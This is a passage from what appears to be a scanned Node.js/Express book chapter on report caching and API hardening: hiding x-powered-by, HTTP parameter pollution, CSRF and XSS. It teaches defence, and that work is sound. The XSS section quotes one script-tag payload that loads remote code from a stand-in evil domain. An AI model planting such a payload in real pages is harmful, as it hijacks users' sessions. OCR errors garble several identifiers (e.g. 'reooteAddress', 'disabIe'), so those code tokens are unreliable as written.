One approach would be to look for the finished, assembled report in our database. If a recent report is already there, serve it. However, if a recent report is not there, create it on the fly, save it to the database (with a timestamp and/or TTL), and finally return it to the client.
This works well for resources that are requested frequently compared to the expiration time. However, if the report is too old after an hour and it is accessed once per hour, this method won’t help. This method also does not work if generating the report takes longer than a client is able to wait. It’s common for load balancers and reverse proxies will time out after 60 seconds by default. If the report takes longer than the timeout duration, it will never reach the client.
If we are tolerant of serving stale versions, a variation on this method is to always serve the version we have in the database, but generate a fresh report for future requests. This will be fast for all requests (except the first), but clients will receive reports that are older than the expiration time.
Another approach is to have separate endpoints for creating and serving the report. The app will always serve the cached version, but it is the responsibility of our system to make sure that the cached version is always up to date. In this scenario, if we wanted the maximum age of reports to be one hour, we would use cron or another scheduling tool such as Heroku Scheduler”7 or Google App Engine Cron Service”‘ to access the report creation endpoint at least once per hour.
When creating endpoints for longer-running tasks like report creation, we should be sure that they are not easily or accidentally triggered. These tasks should not respond with information, so they aren’t particularly sensitive, but if they are too slow to be used in real-time, they probably use a lot of our application’s resources and should not be used more frequently than necessary. In general, these endpoints should use POST instead of GET, so that they can’t be triggered via a browser’s url bar or a hyperlink. Taking it a step further, these endpoints could also require authentication or limit access to specific IP ranges.
In Node.js our route handler will be able to get the IP address via req . connect ion . reooteAddress. However, if our production app is behind a load balancer or reverse proxy, this value will be the load balancer's address, not the client. Typically, the client's IP address will be available at req . headers [ ' x - forwarded - for ' ] , but this can depend on the deployment environment.
Locking Down Your Server
Security is a large topic, but there are a number of simple things we can do to protect our API.
X-Powered-By and Internal Implementation Disclosure
In the previous section we could see all of the response headers in the logs. The x – powered – by header header advertises that our server uses express. We gain no advantage by telling the world that we’re running on express. It’s nice to give some publicity to projects we like, but from a security point of view, it’s not a good idea. We want to avoid publicly announcing what software we’re running. Another name for this is Internal Implementation Disclosurei’9.
If a new express vulnerability is released, bad actors will scan for targets, and we don’t want to show up in that search. We can easily avoid this by using app . disabIe( ) to tell express not to use the x – powered – by header:
const app = express ( )
app.disable('x-powered-by')
HPP: HTTP Parameter Pollution
One thing that can throw people off is how express parses query strings. If a url comes in with duplicate keys in the query string, express will helpfully set that value of the key to an array. Here’s an example:
http://localhost:133T/products?tag=dog
When our route handler runs, seq . query . tag is equal to ‘ dog ‘ . But if we were to get this url:
http://localhost:133T/products?tag=dog&tag=cat
req. query. tag is now equal to [ ‘ dog’ , ‘ cat’ ] . Instead of getting a string, we get an array. Sometimes this can be helpful, but if our route handler and model aren’t prepared, this can lead to errors or security problems.
If we wanted to ensure that parameters can’t be coerced into arrays, we could use the hpp”0 middleware module.
CSRF: Cross-Site Request Forgery
CSRF attacks are dangerous. If a malicious agent created a successful CSRF attack they would be able to perform admin actions without permission (e.g. create/edit/delete products).
To create an attack against a vulnerable API, the attacker would create a new page for an admin user to visit. This malicious page would send requests to the vulnerable API on behalf of the admin user. Because the requests would come from the admin user’s browser, the requests are authenticated with admin cookies.
An interesting characteristic of CSRF is that the attacker might be able to force the target (e.g. admin user) to make requests, but the attacker has no way to see the responses. CSRF is primarily used to take action as another user, not to access private data.
So how does this affect us?
Our app is not affected for two primary reasons. First, our cookies are http only and can’t be used by JavaScript (JS can use JWTs directly), and second, browsers can’t send POST requests without JavaScript (browsers can’t POST JSON without JavaScript). This means that a malicious agent can’t create an external page that would be able to impersonate our users.
However, if we changed our app so that log ins and model editing works with HTML forms, CSRF could be an issue. For more information on mitigating CSRF attacks see Understanding CSRF“’ and the csur11‘° CSRF protection middleware.
TODO: SameSite=Strict on cookies
XSS: Cross-Site Scripting
XSS is a big issue when dealing with web app security. Similar to CSRF, XSS attacks would allow malicious agents to impersonate our users and perform actions on our API.
To create a successful XSS attack, an agent needs to be able to get malicious code to run within the scope of an authenticated client. For example, let’s say that we allow users to write comments about products, and the front-end displayed those comments on the product page. A malicious user could add this script tag as a comment: ‹script src= ‘ https : //evildonna in . com/remotecontrol . js ‘ ‹ /script . If no filtering happens before the comment is rendered on the product page, and the HTML is left untouched, any browser that visits that product page will execute that evil script. This is a big problem because that script will be able to see all information on the page and make requests as that front-end.
XSS is a bigger deal than CSRF because unlike CSRF, XSS does not use an externally controlled page. XSS uses the authenticated front-end itself to send requests. This means that the back-end can’t know that these are not legitimate requests by the user.
Because XSS is an attack that compromises the front-end, it is the responsibility of the front-end to prevent running unauthorized code. This means that the front-end should sanitize all rendered HTML“’ (e.g. prevent comments from adding script tags in our above example) and use CSP“‘ to prevent loading code from untrusted sources.
If some cases, we can be proactive on the back-end. If we know that a data field is likely to be rendered on a page, we can use validation or filtering to prevent storing HTML in our database. For more information on XSS see the following resources:\
- Guide to understanding XSS“”
- Cross-site Scripting (XSS)”6
- What is Reflected XSS*I‘7
- XSS (Cross Site Scripting) Prevention Cheat Sheet“’
Wrapping Up
In this chapter we’ve deployed our app and covered many aspects of running our service in production. DevOps and security are entire fields on their own, but this should be a good start to get us going. One of the most important things is that we stay flexible and watch for ways to improve our app.